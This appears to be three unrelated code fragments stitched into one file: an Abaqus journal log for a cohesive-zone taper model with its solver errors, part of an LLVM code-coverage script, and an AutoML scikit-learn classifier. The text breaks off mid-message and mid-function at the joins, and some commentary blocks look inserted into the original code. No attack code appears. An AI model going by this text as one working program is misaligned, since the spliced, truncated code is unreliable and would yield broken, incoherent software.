endEdges=mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#40100000 ]', ), ), number=18, ratio=2.0)
mdb.models['Model-1'].parts['Part-2'].seedEdgeByBias(biasMethod=DOUBLE,
endEdges=mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#40100000 ]', ), ), number=18, ratio=3.0)
mdb.models['Model-1'].parts['Part-2'].generateMesh()
mdb.models['Model-1'].parts['Part-2'].deleteMesh(regions=
mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask((
'[#3fc5a ]', ), ))
mdb.models['Model-1'].parts['Part-2'].PartitionCellByExtrudeEdge(cells=
mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask(('[#4 ]',
), ), edges=(mdb.models['Model-1'].parts['Part-2'].edges[19], ), line=
mdb.models['Model-1'].parts['Part-2'].edges[95], sense=REVERSE)
mdb.models['Model-1'].parts['Part-2'].PartitionCellByExtrudeEdge(cells=
mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask((
'[#1000 ]', ), ), edges=(mdb.models['Model-1'].parts['Part-2'].edges[0], ),
line=mdb.models['Model-1'].parts['Part-2'].edges[101], sense=REVERSE)
mdb.models['Model-1'].parts['Part-2'].PartitionCellByExtrudeEdge(cells=
mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask((
'[#8040 ]', ), ), edges=(mdb.models['Model-1'].parts['Part-2'].edges[13], )
, line=mdb.models['Model-1'].parts['Part-2'].edges[111], sense=FORWARD)
# Save by banerjee on Tue Oct 18 16:12:24 2011
from part import *
from material import *
from section import *
from assembly import *
from step import *
from interaction import *
from load import *
from mesh import *
from job import *
from sketch import *
from visualization import *
from connectorBehavior import *
mdb.models['Model-1'].parts['Part-2'].setMeshControls(algorithm=ADVANCING_FRONT
, regions=mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask((
'[#2814d ]', ), ), technique=SWEEP)
mdb.models['Model-1'].parts['Part-2'].setMeshControls(algorithm=ADVANCING_FRONT
, regions=mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask((
'[#2 ]', ), ), technique=SWEEP)
mdb.models['Model-1'].parts['Part-2'].generateMesh()
# Save by banerjee on Tue Oct 18 16:19:19 2011
from part import *
from material import *
from section import *
from assembly import *
from step import *
from interaction import *
from load import *
from mesh import *
from job import *
from sketch import *
from visualization import *
from connectorBehavior import *
mdb.models['Model-1'].parts['Part-2'].sectionAssignments[1].setValues(region=
Region(
cells=mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask(
mask=('[#a0c01 ]', ), )))
mdb.models['Model-1'].parts['Part-2'].sectionAssignments[2].setValues(region=
Region(
cells=mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask(
mask=('[#205000 ]', ), )))
mdb.models['Model-1'].parts['Part-2'].sectionAssignments[6].setValues(region=
Region(
cells=mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask(
mask=('[#200 ]', ), )))
mdb.models['Model-1'].parts['Part-2'].sectionAssignments[7].setValues(region=
Region(
cells=mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask(
mask=('[#70 ]', ), )))
mdb.models['Model-1'].parts['Part-2'].sectionAssignments[8].setValues(region=
Region(
cells=mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask(
mask=('[#8 ]', ), )))
# Save by banerjee on Tue Oct 18 16:46:35 2011
from part import *
from material import *
from section import *
from assembly import *
from step import *
from interaction import *
from load import *
from mesh import *
from job import *
from sketch import *
from visualization import *
from connectorBehavior import *
mdb.jobs['OneTaper3D'].submit(consistencyChecking=OFF)
mdb.jobs['OneTaper3D']._Message(STARTED, {'phase': BATCHPRE_PHASE,
'clientHost': 'kirchhoff', 'handle': 0, 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ERROR, {'phase': BATCHPRE_PHASE,
'message': 'in keyword *DAMAGESTABILIZATION, file "OneTaper3D.inp", line 44524: The keyword is misplaced. It can be suboption for the following keyword(s)/level(s): damageevolution',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ABORTED, {'phase': BATCHPRE_PHASE,
'message': 'Analysis phase failed due to errors', 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ERROR, {
'message': 'Analysis Input File Processor exited with an error.',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(JOB_ABORTED, {
'message': 'Analysis Input File Processor exited with an error.',
'jobName': 'OneTaper3D'})
mdb.models['Model-1'].parts['Part-2'].setElementType(elemTypes=(ElemType(
elemCode=COH3D8, elemLibrary=STANDARD), ElemType(elemCode=COH3D6,
elemLibrary=STANDARD), ElemType(elemCode=UNKNOWN_TET,
elemLibrary=STANDARD)), regions=(
mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask((
'[#40142 ]', ), ), ))
mdb.models['Model-1'].parts['Part-2'].setElementType(elemTypes=(ElemType(
elemCode=COH3D8, elemLibrary=STANDARD), ElemType(elemCode=COH3D6,
elemLibrary=STANDARD), ElemType(elemCode=UNKNOWN_TET,
elemLibrary=STANDARD)), regions=(
mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask(('[#a0 ]',
), ), ))
mdb.models['Model-1'].parts['Part-2'].setElementType(elemTypes=(ElemType(
elemCode=COH3D8, elemLibrary=STANDARD), ElemType(elemCode=COH3D6,
elemLibrary=STANDARD), ElemType(elemCode=UNKNOWN_TET,
elemLibrary=STANDARD)), regions=(
mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask(('[#210 ]',
), ), ))
del mdb.models['Model-1'].materials['CohesiveMatFaceFace'].quadeDamageInitiation
mdb.models['Model-1'].materials['CohesiveMatFaceFace'].elastic.setValues(table=
((6900000000000.0, 6900000000000.0, 6900000000000.0), ), type=TRACTION)
mdb.models['Model-1'].materials['CohesiveMatFaceFace'].MaxsDamageInitiation(
table=((60000000.0, 50000000.0, 50000000.0), ))
mdb.models['Model-1'].materials['CohesiveMatFaceFace'].maxsDamageInitiation.DamageEvolution(
table=((0.001, ), ), type=DISPLACEMENT)
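# The three statements above appear to address the earlier
# "*DAMAGESTABILIZATION ... misplaced" input-file error: the QUADE damage
# initiation definition is removed, the cohesive elasticity is switched to the
# TRACTION form, and damage initiation is re-declared with the MAXS criterion
# plus a displacement-based DamageEvolution suboption, under which the
# stabilization data can legally appear according to the error message above.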
mdb.meshEditOptions.setValues(enableUndo=True, maxUndoCacheElements=0.5)
# Save by banerjee on Tue Oct 18 17:03:02 2011
from part import *
from material import *
from section import *
from assembly import *
from step import *
from interaction import *
from load import *
from mesh import *
from job import *
from sketch import *
from visualization import *
from connectorBehavior import *
mdb.jobs['OneTaper3D'].submit(consistencyChecking=OFF)
mdb.jobs['OneTaper3D']._Message(STARTED, {'phase': BATCHPRE_PHASE,
'clientHost': 'kirchhoff', 'handle': 0, 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ERROR, {'phase': BATCHPRE_PHASE,
'message': 'in keyword *ELEMENTOUTPUT, file "OneTaper3D.inp", line 44573: Unknown assembly set _PICKEDSET27',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ERROR, {'phase': BATCHPRE_PHASE,
'message': 'ERROR INDICATOR OUTPUT HAS BEEN SPECIFIED ON ELSET ASSEMBLY__PICKEDSET27 BUT THIS ELSET HAS NOT BEEN DEFINED',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ABORTED, {'phase': BATCHPRE_PHASE,
'message': 'Analysis phase failed due to errors', 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ERROR, {
'message': 'Analysis Input File Processor exited with an error.',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(JOB_ABORTED, {
'message': 'Analysis Input File Processor exited with an error.',
'jobName': 'OneTaper3D'})
del mdb.models['Model-1'].remeshingRules['RemeshingRule-1']
mdb.jobs['OneTaper3D'].submit(consistencyChecking=OFF, datacheckJob=True)
mdb.jobs['OneTaper3D']._Message(STARTED, {'phase': BATCHPRE_PHASE,
'clientHost': 'kirchhoff', 'handle': 0, 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ERROR, {'phase': BATCHPRE_PHASE,
'message': '12 elements have missing property definitions. The elements have been identified in element set ErrElemMissingSection.',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(WARNING, {'phase': BATCHPRE_PHASE,
'message': '12 elements have incorrect property definitions. The elements have been identified in element set WarnElemIncorrectProperty.',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ERROR, {'phase': BATCHPRE_PHASE,
'message': 'SECTION DEFINITIONS ARE MISSING OR INCORRECT FOR THE ELEMENTS INDICATED ABOVE. FURTHER PROCESSING OF THE INPUT FILE IS NOT POSSIBLE UNTIL THIS INPUT ERROR IS FIXED.',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ABORTED, {'phase': BATCHPRE_PHASE,
'message': 'Analysis phase failed due to errors', 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ERROR, {
'message': 'Analysis Input File Processor exited with an error.',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(JOB_ABORTED, {
'message': 'Analysis Input File Processor exited with an error.',
'jobName': 'OneTaper3D'})
mdb.models['Model-1'].rootAssembly.unlock()
mdb.models['Model-1'].rootAssembly.regenerate()
mdb.models['Model-1'].rootAssembly.makeIndependent(instances=(
mdb.models['Model-1'].rootAssembly.instances['Part-2-1'], ))
mdb.models['Model-1'].rootAssembly.setElementType(elemTypes=(ElemType(
elemCode=COH3D8, elemLibrary=STANDARD), ElemType(elemCode=COH3D6,
elemLibrary=STANDARD), ElemType(elemCode=UNKNOWN_TET,
elemLibrary=STANDARD)), regions=(
mdb.models['Model-1'].rootAssembly.instances['Part-2-1'].cells.getSequenceFromMask(
('[#8 ]', ), ), ))
mdb.models['Model-1'].parts['Part-2'].SectionAssignment(offset=0.0,
offsetField='', offsetType=MIDDLE_SURFACE, region=Region(
cells=mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask(
mask=('[#8 ]', ), )), sectionName='CohesiveSectionFaceFace',
thicknessAssignment=FROM_SECTION)
mdb.models['Model-1'].rootAssembly.regenerate()
mdb.jobs['OneTaper3D'].submit(consistencyChecking=OFF, datacheckJob=True)
mdb.jobs['OneTaper3D']._Message(STARTED, {'phase': BATCHPRE_PHASE,
'clientHost': 'kirchhoff', 'handle': 0, 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(WARNING, {'phase': BATCHPRE_PHASE,
'message': 'DEGREE OF FREEDOM 4 IS NOT ACTIVE IN THIS MODEL AND CAN NOT BE RESTRAINED',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(WARNING, {'phase': BATCHPRE_PHASE,
'message': 'DEGREE OF FREEDOM 5 IS NOT ACTIVE IN THIS MODEL AND CAN NOT BE RESTRAINED',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(WARNING, {'phase': BATCHPRE_PHASE,
'message': '24 elements are distorted. Either the isoparametric angles are out of the suggested limits or the triangular or tetrahedral quality measure is bad. The elements have been identified in element set WarnElemDistorted.',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(WARNING, {'phase': BATCHPRE_PHASE,
'message': 'Solver problem. Numerical singularity at D.O.F. 2 at one or more of the internal nodes of 10 elements. The elements have been identified in element set WarnElemSolvProbNumSing_2_0_0_0_0.',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ODB_FILE, {'phase': BATCHPRE_PHASE,
'file': '/home2/banerjee/Abaqus/AdvComp/OneTaper3DCZM/OneTaper3D.odb',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(COMPLETED, {'phase': BATCHPRE_PHASE,
'message': 'Analysis phase complete', 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(STARTED, {'phase': STANDARD_PHASE,
'clientHost': 'kirchhoff', 'handle': 0, 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(STEP, {'phase': STANDARD_PHASE, 'stepId': 1,
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ERROR, {
'message': 'The executable /home/Abaqus/6.10-1/exec/standard.exe aborted with system error "Illegal floating point operation" (signal 8). Please check the .dat, .msg, and .sta files for error messages if the files exist. If there are no error messages and you cannot resolve the problem, please run the command "abaqus job=support information=support" to report and save your system information. Use the same command to run Abaqus that you used when the problem occurred. Please contact your local Abaqus support office and send them the input | |
command, output_file_path)
profraw_file_paths = []
if _IsIOS():
profraw_file_paths = [_GetProfrawDataFileByParsingOutput(output)]
elif _IsAndroid():
android_coverage_dir = os.path.join(BUILD_DIR, 'coverage')
for r, _, files in os.walk(android_coverage_dir):
for f in files:
if f.endswith(PROFRAW_FILE_EXTENSION):
profraw_file_paths.append(os.path.join(r, f))
else:
for file_or_dir in os.listdir(report_root_dir):
if file_or_dir.endswith(PROFRAW_FILE_EXTENSION):
profraw_file_paths.append(
os.path.join(report_root_dir, file_or_dir))
assert profraw_file_paths, (
'Running target "%s" failed to generate any profraw data file, '
'please make sure the binary exists, is properly instrumented and '
'does not crash. %s' % (target, FILE_BUG_MESSAGE))
assert isinstance(profraw_file_paths, list), (
'Variable \'profraw_file_paths\' is expected to be of type \'list\', '
'but it is a %s. %s' % (type(profraw_file_paths), FILE_BUG_MESSAGE))
try:
profdata_file_path = _CreateTargetProfDataFileFromProfRawFiles(
target, profraw_file_paths)
break
except Exception:
logging.info('Retrying...')
finally:
# Remove profraw files now so that they are not used in next iteration.
for profraw_file_path in profraw_file_paths:
os.remove(profraw_file_path)
assert profdata_file_path, (
'Failed to merge target "%s" profraw files after %d retries. %s' %
(target, MERGE_RETRIES, FILE_BUG_MESSAGE))
profdata_file_paths.append(profdata_file_path)
logging.debug('Finished executing the test commands.')
return profdata_file_paths
def _GetEnvironmentVars(profraw_file_path):
"""Return environment vars for subprocess, given a profraw file path."""
env = os.environ.copy()
env.update({
'LLVM_PROFILE_FILE': profraw_file_path,
'PATH': _GetPathWithLLVMSymbolizerDir()
})
return env
def _SplitCommand(command):
"""Split a command string into parts in a platform-specific way."""
if coverage_utils.GetHostPlatform() == 'win':
return command.split()
return shlex.split(command)
def _ExecuteCommand(target, command, output_file_path):
"""Runs a single command and generates a profraw data file."""
# Per Clang "Source-based Code Coverage" doc:
#
# "%p" expands out to the process ID. It's not used by this scripts due to:
# 1) If a target program spawns too many processess, it may exhaust all disk
# space available. For example, unit_tests writes thousands of .profraw
# files each of size 1GB+.
# 2) If a target binary uses shared libraries, coverage profile data for them
# will be missing, resulting in incomplete coverage reports.
#
# "%Nm" expands out to the instrumented binary's signature. When this pattern
# is specified, the runtime creates a pool of N raw profiles which are used
# for on-line profile merging. The runtime takes care of selecting a raw
# profile from the pool, locking it, and updating it before the program exits.
# N must be between 1 and 9. The merge pool specifier can only occur once per
# filename pattern.
#
# "%1m" is used when tests run in single process, such as fuzz targets.
#
# For other cases, "%4m" is chosen as it creates some level of parallelism,
# but it is not so large that it consumes excessive computing resources or disk space.
profile_pattern_string = '%1m' if _IsFuzzerTarget(target) else '%4m'
expected_profraw_file_name = os.extsep.join(
[target, profile_pattern_string, PROFRAW_FILE_EXTENSION])
expected_profraw_file_path = os.path.join(
coverage_utils.GetCoverageReportRootDirPath(OUTPUT_DIR),
expected_profraw_file_name)
command = command.replace(LLVM_PROFILE_FILE_PATH_SUBSTITUTION,
expected_profraw_file_path)
try:
# Some fuzz targets or tests may write into stderr, redirect it as well.
with open(output_file_path, 'wb') as output_file_handle:
subprocess.check_call(_SplitCommand(command),
stdout=output_file_handle,
stderr=subprocess.STDOUT,
env=_GetEnvironmentVars(expected_profraw_file_path))
except subprocess.CalledProcessError as e:
logging.warning('Command: "%s" exited with non-zero return code.', command)
return open(output_file_path, 'rb').read()
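# Example (illustrative): for a non-fuzzer target named "url_unittests",
# _ExecuteCommand() substitutes LLVM_PROFILE_FILE_PATH_SUBSTITUTION with a
# path such as
#   <report_root_dir>/url_unittests.%4m.profraw
# and passes it to the test process via the LLVM_PROFILE_FILE environment
# variable; the LLVM runtime then expands "%4m" into a pool of four raw
# profiles that it merges on-line as instrumented processes exit.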
def _IsFuzzerTarget(target):
"""Returns true if the target is a fuzzer target."""
build_args = _GetBuildArgs()
use_libfuzzer = ('use_libfuzzer' in build_args and
build_args['use_libfuzzer'] == 'true')
return use_libfuzzer and target.endswith('_fuzzer')
def _ExecuteIOSCommand(command, output_file_path):
"""Runs a single iOS command and generates a profraw data file.
iOS application doesn't have write access to folders outside of the app, so
it's impossible to instruct the app to flush the profraw data file to the
desired location. The profraw data file will be generated somewhere within the
application's Documents folder, and the full path can be obtained by parsing
the output.
"""
assert _IsIOSCommand(command)
# After running tests, iossim generates a profraw data file, it won't be
# needed anyway, so dump it into the OUTPUT_DIR to avoid polluting the
# checkout.
iossim_profraw_file_path = os.path.join(
OUTPUT_DIR, os.extsep.join(['iossim', PROFRAW_FILE_EXTENSION]))
command = command.replace(LLVM_PROFILE_FILE_PATH_SUBSTITUTION,
iossim_profraw_file_path)
try:
with open(output_file_path, 'wb') as output_file_handle:
subprocess.check_call(_SplitCommand(command),
stdout=output_file_handle,
stderr=subprocess.STDOUT,
env=_GetEnvironmentVars(iossim_profraw_file_path))
except subprocess.CalledProcessError as e:
# iossim emits non-zero return code even if tests run successfully, so
# ignore the return code.
pass
return open(output_file_path, 'rb').read()
def _GetProfrawDataFileByParsingOutput(output):
"""Returns the path to the profraw data file obtained by parsing the output.
The output of running the test target has no format, but it is guaranteed to
have a single line containing the path to the generated profraw data file.
NOTE: This should only be called when target os is iOS.
"""
assert _IsIOS()
output_by_lines = ''.join(output).splitlines()
profraw_file_pattern = re.compile(r'.*Coverage data at (.*coverage\.profraw).')
for line in output_by_lines:
result = profraw_file_pattern.match(line)
if result:
return result.group(1)
assert False, ('No profraw data file was generated, did you call '
'coverage_util::ConfigureCoverageReportPath() in test setup? '
'Please refer to base/test/test_support_ios.mm for example.')
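# Illustrative check of the parsing above; the sample line is hypothetical but
# follows the "Coverage data at ..." format described in the docstring:
#
#   >>> pattern = re.compile(r'.*Coverage data at (.*coverage\.profraw).')
#   >>> pattern.match('Coverage data at /tmp/Documents/coverage.profraw.').group(1)
#   '/tmp/Documents/coverage.profraw'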
def _CreateCoverageProfileDataFromTargetProfDataFiles(profdata_file_paths):
"""Returns a relative path to coverage profdata file by merging target
profdata files.
Args:
profdata_file_paths: A list of relative paths to the profdata files
that are to be merged.
Returns:
A relative path to the merged coverage profdata file.
Raises:
CalledProcessError: An error occurred merging profdata files.
"""
logging.info('Creating the coverage profile data file.')
logging.debug('Merging target profraw files to create target profdata file.')
profdata_file_path = _GetProfdataFilePath()
try:
subprocess_cmd = [
LLVM_PROFDATA_PATH, 'merge', '-o', profdata_file_path, '-sparse=true'
]
subprocess_cmd.extend(profdata_file_paths)
output = subprocess.check_output(subprocess_cmd)
logging.debug('Merge output: %s', output)
except subprocess.CalledProcessError as error:
logging.error(
'Failed to merge target profdata files to create coverage profdata. %s',
FILE_BUG_MESSAGE)
raise error
logging.debug('Finished merging target profdata files.')
logging.info('Code coverage profile data is created as: "%s".',
profdata_file_path)
return profdata_file_path
def _CreateTargetProfDataFileFromProfRawFiles(target, profraw_file_paths):
"""Returns a relative path to target profdata file by merging target
profraw files.
Args:
    profraw_file_paths: A list of relative paths to the profraw data files
      that are to be merged.
  Returns:
    A relative path to the merged target profdata file.
  Raises:
    CalledProcessError: An error occurred merging profraw files.
"""
logging.info('Creating target profile data file.')
logging.debug('Merging target profraw files to create target profdata file.')
profdata_file_path = os.path.join(OUTPUT_DIR, '%s.profdata' % target)
try:
subprocess_cmd = [
LLVM_PROFDATA_PATH, 'merge', '-o', profdata_file_path, '-sparse=true'
]
subprocess_cmd.extend(profraw_file_paths)
output = subprocess.check_output(subprocess_cmd)
logging.debug('Merge output: %s', output)
except subprocess.CalledProcessError as error:
logging.error(
'Failed to merge target profraw files to create target profdata.')
raise error
logging.debug('Finished merging target profraw files.')
logging.info('Target "%s" profile data is created as: "%s".', target,
profdata_file_path)
return profdata_file_path
def _GeneratePerFileCoverageSummary(binary_paths, profdata_file_path, filters,
ignore_filename_regex):
"""Generates per file coverage summary using "llvm-cov export" command."""
# llvm-cov export [options] -instr-profile PROFILE BIN [-object BIN,...]
# [[-object BIN]] [SOURCES].
  # NOTE: For object files, the first one is specified as a positional argument,
  # and the rest are passed via repeated -object flags.
logging.debug('Generating per-file code coverage summary using "llvm-cov '
'export -summary-only" command.')
for path in binary_paths:
if not os.path.exists(path):
logging.error("Binary %s does not exist", path)
subprocess_cmd = [
LLVM_COV_PATH, 'export', '-summary-only',
'-instr-profile=' + profdata_file_path, binary_paths[0]
]
subprocess_cmd.extend(
['-object=' + binary_path for binary_path in binary_paths[1:]])
_AddArchArgumentForIOSIfNeeded(subprocess_cmd, len(binary_paths))
subprocess_cmd.extend(filters)
if ignore_filename_regex:
subprocess_cmd.append('-ignore-filename-regex=%s' % ignore_filename_regex)
export_output = subprocess.check_output(subprocess_cmd)
# Write output on the disk to be used by code coverage bot.
with open(_GetSummaryFilePath(), 'w') as f:
f.write(export_output)
return export_output
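# Editor's note: a hedged sketch (not part of the original script) of how the
# exported summary could be consumed. The JSON layout assumed here
# ("data"[0]["totals"] / ["files"]) matches recent llvm-cov versions, but the
# key names may differ for your toolchain; verify against your llvm-cov output.
def _DemoReadLineCoverage(export_output):
  import json
  summary = json.loads(export_output)
  total_line_percent = summary['data'][0]['totals']['lines']['percent']
  per_file = {entry['filename']: entry['summary']['lines']['percent']
              for entry in summary['data'][0]['files']}
  return total_line_percent, per_file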
def _AddArchArgumentForIOSIfNeeded(cmd_list, num_archs):
"""Appends -arch arguments to the command list if it's ios platform.
iOS binaries are universal binaries, and require specifying the architecture
to use, and one architecture needs to be specified for each binary.
"""
if _IsIOS():
cmd_list.extend(['-arch=x86_64'] * num_archs)
def _GetBinaryPath(command):
"""Returns a relative path to the binary to be run by the command.
  Currently, the following types of commands are supported (e.g. url_unittests):
  1. Run the test binary directly: "out/coverage/url_unittests <arguments>"
2. Use xvfb.
2.1. "python testing/xvfb.py out/coverage/url_unittests <arguments>"
2.2. "testing/xvfb.py out/coverage/url_unittests <arguments>"
3. Use iossim to run tests on iOS platform, please refer to testing/iossim.mm
for its usage.
3.1. "out/Coverage-iphonesimulator/iossim
<iossim_arguments> -c <app_arguments>
out/Coverage-iphonesimulator/url_unittests.app"
Args:
command: A command used to run a target.
Returns:
A relative path to the binary.
"""
xvfb_script_name = os.extsep.join(['xvfb', 'py'])
command_parts = _SplitCommand(command)
if os.path.basename(command_parts[0]) == 'python':
assert os.path.basename(command_parts[1]) == xvfb_script_name, (
'This tool doesn\'t understand the command: "%s".' % command)
return command_parts[2]
if os.path.basename(command_parts[0]) == xvfb_script_name:
return command_parts[1]
if _IsIOSCommand(command):
# For a given application bundle, the binary resides in the bundle and has
    # the same name as the application without the .app extension.
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import statsmodels.api as sm
from sklearn.impute import SimpleImputer
from sklearn.compose import ColumnTransformer, make_column_selector
from sklearn.preprocessing import StandardScaler, MinMaxScaler, RobustScaler, OneHotEncoder
from sklearn.feature_selection import SelectKBest, f_classif, f_regression
from sklearn.model_selection import RandomizedSearchCV
from sklearn.pipeline import Pipeline
from sklearn.linear_model import LogisticRegression
from sklearn.linear_model import LinearRegression, Lasso, Ridge, ElasticNet
from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier
from sklearn.ensemble import RandomForestRegressor, GradientBoostingRegressor
from sklearn.neighbors import KNeighborsClassifier, NearestNeighbors
from sklearn.tree import DecisionTreeClassifier
from sklearn.svm import LinearSVC, SVR
from xgboost import XGBClassifier, XGBRegressor
from sklearn.cluster import KMeans, DBSCAN
from sklearn.decomposition import PCA
from sklearn.metrics import balanced_accuracy_score, classification_report, plot_confusion_matrix
from sklearn.metrics import mean_absolute_error, silhouette_score
class AutoML_Classifier:
'''
AutoML algorithm for classification.
Args:
    scoring_func - the scoring metric to optimize (default = 'balanced_accuracy')
    n_iter - the number of parameter-search iterations (default = 50)
    random_state - the random seed (default = 0)
    cv - the number of cross-validation folds (default = 5).
    Set an algorithm flag (e.g. KNN=False) to exclude it from the search.
'''
def __init__(self, scoring_func='balanced_accuracy',
n_iter=50, random_state=0, cv=5,
LogisticRegression=True, KNN=True,
DecisionTree=True, RandomForest=True,
LinearSVC=True, GradientBoosting=True,
XGB=True):
self.scoring_func = scoring_func
self.n_iter = n_iter
self.random_state = random_state
self.cv = cv
self.LogisticRegression = LogisticRegression
self.KNN = KNN
self.DecisionTree = DecisionTree
self.RandomForest = RandomForest
self.LinearSVC = LinearSVC
self.GradientBoosting = GradientBoosting
self.XGB = XGB
def fit(self, X, y):
'''
Args:
X - a data frame with predictors
y - predicted variable.
It selects an optimal machine learning algorithm and performs all
the data preprocessing necessary for this algorithm.
Return:
            None. The fitted object exposes the best_estimator_, best_pipeline
            (the best parameters found) and cv_results_ attributes.
'''
X_train = X
y_train = y
# All unique cat values
cat_val = []
cat_subset = X_train.select_dtypes(include = ['object', 'category', 'bool'])
for i in cat_subset.columns:
cat_val.append(list(cat_subset[i].dropna().unique()))
# Preprocessing
cat_pipeline = Pipeline([('cleaner', SimpleImputer(strategy = 'most_frequent')),
('encoder', OneHotEncoder(sparse = False, categories = cat_val))])
num_pipeline = Pipeline([('cleaner', SimpleImputer()),
('scaler', StandardScaler())])
preprocessor = ColumnTransformer([
('numerical', num_pipeline, make_column_selector(dtype_exclude = ['object', 'category', 'bool'])),
('categorical', cat_pipeline, make_column_selector(dtype_include = ['object', 'category', 'bool']))
])
# Main pipeline
model_pipeline_steps = []
model_pipeline_steps.append(('preprocessor', preprocessor))
model_pipeline_steps.append(('feature_selector', SelectKBest(f_classif, k = 'all')))
model_pipeline_steps.append(('estimator', LogisticRegression()))
model_pipeline = Pipeline(model_pipeline_steps)
total_features = preprocessor.fit_transform(X_train).shape[1]
optimization_grid = []
# ALGORITHMS SELECTION
# Logistic regression
if self.LogisticRegression == True:
optimization_grid.append({
'preprocessor__numerical__scaler': [RobustScaler(), StandardScaler(), MinMaxScaler()],
'preprocessor__numerical__cleaner__strategy': ['mean', 'median'],
'feature_selector__k': list(np.arange(1, total_features, 5)) + ['all'],
'estimator': [LogisticRegression()]
})
# K-nearest neighbors
if self.KNN == True:
optimization_grid.append({
'preprocessor__numerical__scaler': [RobustScaler(), StandardScaler(), MinMaxScaler()],
'preprocessor__numerical__cleaner__strategy': ['mean', 'median'],
'feature_selector__k': list(np.arange(1, total_features, 5)) + ['all'],
'estimator': [KNeighborsClassifier()],
'estimator__weights': ['uniform', 'distance'],
'estimator__n_neighbors': np.arange(1, 20, 1)
})
# Decision tree
if self.DecisionTree == True:
optimization_grid.append({
'preprocessor__numerical__scaler': [None],
'preprocessor__numerical__cleaner__strategy': ['mean', 'median'],
'feature_selector__k': list(np.arange(1, total_features, 5)) + ['all'],
'estimator': [DecisionTreeClassifier(random_state = self.random_state)],
'estimator__criterion': ['gini', 'entropy']
})
# Random Forest
if self.RandomForest == True:
optimization_grid.append({
'preprocessor__numerical__scaler': [None],
'preprocessor__numerical__cleaner__strategy': ['mean', 'median'],
'feature_selector__k': list(np.arange(1, total_features, 5)) + ['all'],
'estimator': [RandomForestClassifier(random_state = self.random_state)],
'estimator__n_estimators': np.arange(5, 1000, 20),
'estimator__criterion': ['gini', 'entropy']
})
# Linear SVM
if self.LinearSVC == True:
optimization_grid.append({
'preprocessor__numerical__scaler': [RobustScaler(), StandardScaler(), MinMaxScaler()],
'preprocessor__numerical__cleaner__strategy': ['mean','median'],
'feature_selector__k': list(np.arange(1, total_features, 5)) + ['all'],
'estimator': [LinearSVC(random_state = self.random_state)],
'estimator__C': np.arange(0.1, 1.1, 0.1),
})
# Gradient boosting
if self.GradientBoosting == True:
optimization_grid.append({
'preprocessor__numerical__scaler': [None],
'preprocessor__numerical__cleaner__strategy': ['mean', 'median'],
'feature_selector__k': list(np.arange(1, total_features, 5)) + ['all'],
'estimator': [GradientBoostingClassifier(random_state = self.random_state)],
'estimator__n_estimators': np.arange(5, 1000, 20),
'estimator__learning_rate': np.linspace(0.01, 1.0, 30),
})
# XGBoost
if self.XGB == True:
optimization_grid.append({
'preprocessor__numerical__scaler': [None],
'preprocessor__numerical__cleaner__strategy': ['mean', 'median'],
'feature_selector__k': list(np.arange(1, total_features, 5)) + ['all'],
'estimator': [XGBClassifier(random_state = self.random_state)],
'estimator__n_estimators': np.arange(5, 1000, 20),
'estimator__learning_rate': np.linspace(0.01, 1.0, 30),
})
# Search the best estimator
search = RandomizedSearchCV(
model_pipeline,
optimization_grid,
n_iter = self.n_iter,
scoring = self.scoring_func,
n_jobs = -1,
random_state = self.random_state,
verbose = 1,
cv = self.cv,
return_train_score = True)
search.fit(X_train, y_train)
self.best_estimator_ = search.best_estimator_
self.best_pipeline = search.best_params_
self.cv_results_ = search.cv_results_
best_alg = str(self.best_pipeline['estimator']).split('(')[0]
print('{} was used as the best algorithm!'.format(best_alg))
def predict(self, X, save=False, f_format='excel'):
'''
Class prediction based on trained AutoML model.
Args:
X - a data frame with test data
save - save prediction in local directory or not
f_format - format of data saving (if save = True): 'csv' or 'excel' (default)
Return:
the numeric classes.
'''
assert f_format in {'excel', 'csv'}
preds = pd.DataFrame(self.best_estimator_.predict(X))
if save == True and f_format == 'csv':
preds.to_csv('preds.csv')
